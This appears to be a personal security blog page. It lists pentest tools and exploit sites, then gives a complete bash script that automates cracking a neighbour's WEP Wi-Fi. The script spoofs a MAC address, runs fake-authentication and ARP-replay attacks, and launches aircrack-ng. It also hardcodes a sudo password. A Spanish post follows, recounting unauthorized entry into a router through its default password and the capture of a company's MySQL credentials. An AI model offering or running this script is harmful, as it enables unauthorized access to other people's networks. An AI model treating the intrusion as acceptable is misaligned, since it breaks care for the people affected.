Insecurity
Tools:
Nikto.pl Web Scanner
nmap Network Scanner
Metasploit Framework
wfuzz Brute Force Web App
Wireshark Network Protocol Analyzer
Snort IDS
Nessus (vulnerability scanner)
Hydra Cracker Password
John the Ripper Cracker Password (Passive)
Linux Distros:
BackTrack Wireless Tools and others
Damn Vulnerable Linux
Others:
http://sectools.org/
http://www.milw0rm.com/
http://www.exploit-db.com/
http://www.securityfocus.com/
Wireless Hack Bash Script
#!/bin/bash
#
# WARNING: USE AT YOUR OWN RISK!
#
# SIDE EFFECTS: UNHAPPY NEIGHTBORS
#
# Author: ALbertux (Alberto Isaac Ayala Esquivias)
# Mail: <Albertux@AyalaSoft.com>
# Web: http://Albertux.AyalaSoft.com
# Script: Wireless Hack
# Tested on: Ubuntu 9.04
# A little trouble using gksudo gnome-terminal
# https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575
# gnome-terminal -e "sudo ...." # could be ...
# TERM=gnome-terminal
TERM=xterm
# A nasty function to run_like_a_root user sending the passwd
function run_like_a_root() {
sudo -S $@ << EOF
your_password
EOF
}
# Restore to normal: ./this_script.sh restore
if [ "$1" == "restore" ]; then
run_like_a_root "airmon-ng stop mon0"
run_like_a_root "/etc/init.d/networking restart"
run_like_a_root "NetworkManager"
exit 1
fi
# Set Wireless Device: ./this_script.sh wlan1
if [ -z $1 ]; then
WDEVICE=wlan0 # Could be diferrent on your notebook
else
WDEVICE=$1 # Set Wireless Device
fi
# Stop Wireless
run_like_a_root airmon-ng stop $WDEVICE
# Kill all fu**ing process using the Wireless Device:
run_like_a_root kill -9 `run_like_a_root airmon-ng start $WDEVICE | grep ^[1-9] | awk ' { print $1 } '`
# Wireless Devices Down (we need to change the Mac)
run_like_a_root ifconfig $WDEVICE down
run_like_a_root ifconfig mon0 down
# Fake Mac, Example:
FAKEMAC=00:66:00:66:00:66
# Set Fake Mac
run_like_a_root macchanger -m $FAKEMAC $WDEVICE
run_like_a_root macchanger -m $FAKEMAC mon0
# Up the Wireless Interface
run_like_a_root ifconfig mon0 up
# See all available networks
run_like_a_root $TERM -e "airodump-ng mon0" &
# Watch the xterm loaded and write the values (maybe you need resize xterm window)
clear
echo "Network Name: "
read ESSID
echo "Network Mac: "
read BSSID
echo "Network Channel: "
read CHANNEL
echo "Close the airodump-ng xterm and press [enter]"
read
# Get Data (IVs)
run_like_a_root $TERM -e "airodump-ng mon0 -w data -c $CHANNEL --bssid $BSSID" &
# Fake Authentication Attack
run_like_a_root $TERM -e "watch aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKEMAC mon0" &
# ARP Request
run_like_a_root $TERM -e "aireplay-ng -3 -b $BSSID -h $FAKEMAC mon0" &
# Wait some time ...
echo "Press any kay to launch aircrack-ng (30,000+ on data recommended)"
read
# Crack the Passwd
run_like_a_root $TERM -e "aircrack-ng data-*.cap" &
exit 0Free Wireless on Ubuntu 9.04
Saturday Morning Hacking
Este sabado en la mañana (madrugada para mi) acompañe a mi tia a un curso de RNA (Redes Neuronales Artificiales) aplicadas a la valuacion (mi tia es Arquitecta)
Me meti a un ruter AirLink101 (pesimo password: admin) aburrido un poco empeze a jugar con la pagina de AINetSolutions, despues de un tiempo consegui el usuario y password de MySQL.
Aqui un screenshoot:
No modifique nada, solo estuve de observador.
Saludos a toda la raza del MHT, recordando viejas costumbres este dia.
Les mande un correo a los de AINetSolutions espero no se molesten por publicarlo en mi Blog.
Como medidas de seguridad siempre cambien el password del ruter nunca dejen el password que viene por defecto, de preferencia no utilizen conexiones remotas de MySQL o si las requieren utilizen un filtro de IP.
Recent Comments